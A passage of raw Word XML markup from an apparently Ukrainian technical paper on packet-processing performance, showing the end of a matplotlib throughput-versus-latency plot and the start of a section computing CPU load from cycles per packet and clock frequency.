        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Пропускна</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>здатність</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>залежно</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>від</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>затримки</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xlabel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Затримка</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>мкс</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>)')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ylabel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Пропускна</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>здатність</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>пакетів</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/с)')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="00BD5158" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt.grid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(True)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="00BD5158" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>plt.show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD5158">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C0859" w:rsidRPr="003C7FE5" w:rsidRDefault="00BD5158" w:rsidP="00BD5158">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>```</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00444806" w:rsidRPr="004711E1" w:rsidRDefault="00444806" w:rsidP="00444806">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004711E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Це означає, що система здатна обробляти до 500,000 пакетів за секунду при такій затримці.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="007874E0" w:rsidP="007874E0">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BC6B10">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Графік навантаження</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> на </w:t>
      </w:r>
      <w:r w:rsidRPr="007874E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CPU</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">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Pr="007874E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-14"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="900" w:dyaOrig="440">
          <v:shape id="_x0000_i1033" type="#_x0000_t75" style="width:45.45pt;height:21.45pt" o:ole="">
            <v:imagedata r:id="rId37" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1033" DrawAspect="Content" ObjectID="_1793511359" r:id="rId38"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007874E0" w:rsidRPr="007874E0" w:rsidRDefault="007874E0" w:rsidP="006A7651">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007874E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Цей графік показує, як навантаження на процесор змінюється в залежності від кількості пакетів, які обробляються за секунду, при фіксованій кількості тактів</w:t>
      </w:r>
      <w:r w:rsidR="006A7651">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007874E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-14"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="620" w:dyaOrig="440">
          <v:shape id="_x0000_i1034" type="#_x0000_t75" style="width:30.85pt;height:21.45pt" o:ole="">
            <v:imagedata r:id="rId39" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1034" DrawAspect="Content" ObjectID="_1793511360" r:id="rId40"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007874E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>на обробку одного пакету.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007874E0" w:rsidRDefault="007874E0" w:rsidP="007874E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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="007874E0" w:rsidP="007874E0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="0"/>
          <w:tab w:val="center" w:pos="4678"/>
          <w:tab w:val="right" w:pos="9355"/>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ab/>
      </w:r>
      <w:r w:rsidR="00441F21" w:rsidRPr="00441F21">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-36"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="2280" w:dyaOrig="880">
          <v:shape id="_x0000_i1035" type="#_x0000_t75" style="width:114pt;height:44.55pt" o:ole="">
            <v:imagedata r:id="rId41" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1035" DrawAspect="Content" ObjectID="_1793511361" r:id="rId42"/>
        </w:object>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00441F21" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC111E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="00441F21" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00BC6B10" w:rsidRPr="00BC111E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00441F21" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="007A4DA9" w:rsidRDefault="00441F21" w:rsidP="005B2A6E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007874E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-14"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="620" w:dyaOrig="440">
          <v:shape id="_x0000_i1036" type="#_x0000_t75" style="width:30.85pt;height:21.45pt" o:ole="">
            <v:imagedata r:id="rId39" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1036" DrawAspect="Content" ObjectID="_1793511362" r:id="rId43"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="007A4DA9" w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>5000 тактів на пакет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="007A4DA9" w:rsidRDefault="00441F21" w:rsidP="007A4DA9">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-14"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="520" w:dyaOrig="440">
          <v:shape id="_x0000_i1037" type="#_x0000_t75" style="width:26.55pt;height:21.45pt" o:ole="">
            <v:imagedata r:id="rId44" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1037" DrawAspect="Content" ObjectID="_1793511363" r:id="rId45"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="007A4DA9" w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>2.5×10</w:t>
      </w:r>
      <w:r w:rsidR="007A4DA9" w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="007A4DA9" w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> тактів на секунду (для процесора з тактовою частотою 2.5 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007A4DA9" w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>ГГц</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007A4DA9" w:rsidRPr="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5158" w:rsidRPr="003C7FE5" w:rsidRDefault="00441F21" w:rsidP="005B2A6E">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007874E0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:position w:val="-14"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:object w:dxaOrig="499" w:dyaOrig="440">
          <v:shape id="_x0000_i1038" type="#_x0000_t75" style="width:24.85pt;height:21.45pt" o:ole="">
            <v:imagedata r:id="rId46" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1038" DrawAspect="Content" ObjectID="_1793511364" r:id="rId47"/>
        </w:object>
      </w:r>
      <w:r w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="007A4DA9" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>μ</w:t>
      </w:r>
      <w:r w:rsidR="007A4DA9" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">с </w:t>
      </w:r>
      <w:r w:rsidR="007A4DA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidR="007A4DA9" w:rsidRPr="003C7FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">час </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
